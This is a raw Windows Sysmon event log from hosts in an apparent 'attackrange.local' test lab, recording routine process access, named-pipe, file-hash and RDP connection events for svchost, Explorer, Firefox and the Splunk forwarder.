Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046864Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:06.137{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-5563-60E8-2010-00000000CF01}4048C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001046863Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:06.137{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-5563-60E8-2010-00000000CF01}4048C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001046862Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 07:47:06.137{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.4048.408.46251248C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001046861Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:47:06.137{466BC892-5563-60E8-2010-00000000CF01}4048\chrome.4048.408.46251248C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000806606Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:07.788{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9802459BBF6ACD780E83469FD6DA4DD,SHA256=687A7B5DDDB849ED2EF37282DBC748CF09F3272EDF2E5428C77169A86CEF4AF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046870Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:07.336{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=166A7083D12B1B310918918227E925F1,SHA256=A691F4FDB3335E886C5ACF945ADF3ACCDEF853DF092F2CD504F67CFC7FE95417,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806605Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:06.377{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-2202-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000806604Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:07.538{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B836257E21137688BD27A984F660CDB6,SHA256=DE2774570DEDF8BB1678F5D94095D5B8C6F7F40EBB5B08F45299C140C51DEA1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046869Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:07.236{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0BDDC3F6BD66C30EE5927573F5C70117,SHA256=E68CA0B79A32927F5B7CD576BC7205E1D015333B649430FE06B129AE0E026FDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046868Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:07.236{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0D2260DB8B0B4F6B26B1C4B205F7EBA7,SHA256=D71758010BA59709D18FE428F2E223C20567C54493855CEE86F25A3351510622,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806607Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:08.897{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D37CD4BF404957FCB66A04BD7A2473D4,SHA256=75E7FCA93DC8CFA8220ED45116BF8BCAE0FFD4ADB20F9DB464213B9BBECB4A63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046950Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.520{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F07C1E9892DDDAF2115E0697F5B9224B,SHA256=3084A2432E1042D67D2529054B0EAB514B045A5396BF554B9C6F78206380C94D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046949Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:08.388{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046948Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.388{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046947Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:08.388{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046946Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.388{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046945Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:08.388{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046944Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.388{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046943Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:08.388{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046942Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.388{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046941Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:08.388{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046940Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.388{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046939Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:08.388{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046938Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.388{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046937Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:08.388{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046936Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.388{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046935Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:08.388{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046934Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.388{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046933Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:08.388{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046932Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.387{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046931Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:08.387{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046930Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.387{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046929Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:08.387{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046928Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.387{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046927Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
